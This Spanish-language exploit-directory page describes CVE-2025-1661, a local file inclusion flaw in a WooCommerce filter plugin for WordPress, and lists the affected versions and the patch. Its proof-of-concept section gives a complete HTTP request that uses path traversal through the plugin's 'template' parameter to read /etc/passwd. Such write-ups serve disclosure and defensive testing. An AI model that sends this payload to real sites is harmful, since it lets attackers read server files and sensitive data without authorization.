Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-1661 — HUSKY – Products Filter Professional para WooCommerce plugin para WordPress es vulnerable a Local File Inclusion (LFI) | Kitploit
Herramientas/GitHubGitHub/shahwarshah/cve-2025-1661
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y Educación
GitHubshahwarshah/cve-2025-1661

CVE-2025-1661

HUSKY – Products Filter Professional para WooCommerce plugin para WordPress es vulnerable a Local File Inclusion (LFI)

Ver Repositorio
12hace 1 añoAún no revisado
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-1661 - Inclusión de Archivos Locales (LFI) no autenticada en HUSKY – Products Filter Professional para WooCommerce

Descripción

El plugin HUSKY – Products Filter Professional para WooCommerce para WordPress es vulnerable a Inclusión de Archivos Locales (LFI) en todas las versiones hasta la 1.3.6.5 inclusive a través del parámetro template de la acción AJAX woof_text_search.

Esto permite que atacantes no autenticados incluyan y ejecuten archivos arbitrarios en el servidor, lo que potencialmente puede conllevar a:

  • Evitar controles de acceso
  • Extraer datos sensibles
  • Ejecución Remota de Código (RCE) si se cumplen ciertas condiciones (por ejemplo, carga de tipos de archivo "seguros")

Gravedad: Crítica

  • Puntuación CVSS: 9.8 (Crítica)
  • CWE-22 (Path Traversal)
ID de CWE:
  • Puntuación EPS: 0.00061
  • Versiones afectadas

    • Vulnerable: <= 1.3.6.5
    • Versión parcheada: 1.3.6.6

    Corrección

    Actualizar a la versión 1.3.6.6 o a una versión parcheada más reciente.


    Prueba de Concepto (PoC)

    Pasos para reproducir

    1. Visite el sitio web objetivo.
    2. Capture la solicitud usando Burp Suite.
    3. Modifique el método de solicitud a POST y añada el siguiente payload:
    root@kitploit:~
    POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1  HTTP/1.1
    Host: TARGET_SITE_HERE
    Cache-Control: max-age=0
    Accept-Language: en-US,en;q=0.9
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Cookie: YOUR_SESSION_COOKIE_HERE
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 24
    
    action=woof_text_search&
    

    Captura de pantalla de IntercomVulnChecker 4. Si tiene éxito, el servidor devolverá el contenido de /etc/passwd. 5. Esto se puede utilizar para extraer otros archivos sensibles del servidor.


    Referencias

    • Aviso de Wordfence
    • Código del plugin de WordPress
    • Informe CVE

    Aviso legal

    Esta PoC es solo para fines educativos y de investigación. Realizar pruebas no autorizadas contra sistemas sin permiso es ilegal y poco ético. Siempre solicite autorización explícita antes de realizar cualquier prueba de seguridad.

    Descargar herramienta